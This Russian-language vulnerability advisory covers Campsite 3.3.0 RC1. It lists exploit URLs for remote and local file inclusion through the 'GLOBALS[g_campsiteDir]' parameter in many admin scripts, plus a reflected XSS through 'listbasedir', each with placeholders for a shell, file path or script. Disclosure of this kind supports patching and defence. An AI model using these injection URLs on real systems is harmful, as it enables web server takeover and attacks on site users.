Программа: Campsite 3.3.0 RC1

Уязвимость позволяет удаленному пользователю осуществить XSS нападение и
выполнить произвольный PHP сценарий на целевой системе.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «GLOBALS[g_campsiteDir]» множественными сценариями. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Эксплоит:

[RFI]
http://localhost/path/implementation/site/admin-files/ad_popup.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/camp_html.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/init_content.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/logout.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/menu.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/set-author.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/conf/liveuser_configuration.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/include/phorum_load.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/article_import/CommandProcessor.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/article_import/index.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/articles/add.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/articles/add_move.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/articles/autopublish.php?GLOBALS[g_campsiteDir]=[SHELL]
http://localhost/path/implementation/site/admin-files/articles/autopublish_del.php?GLOBALS[g_campsiteDir]=[SHELL]

[LFI]

http://localhost/path/implementation/site/admin-files/ad.php?GLOBALS[g_campsiteDir]=[LFI]

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «listbasedir» сценарием list_dir.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.

Эксплоит:

http://localhost/path/implementation/site/admin-files/templates/list_dir.php?listbasedir=[XSS]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии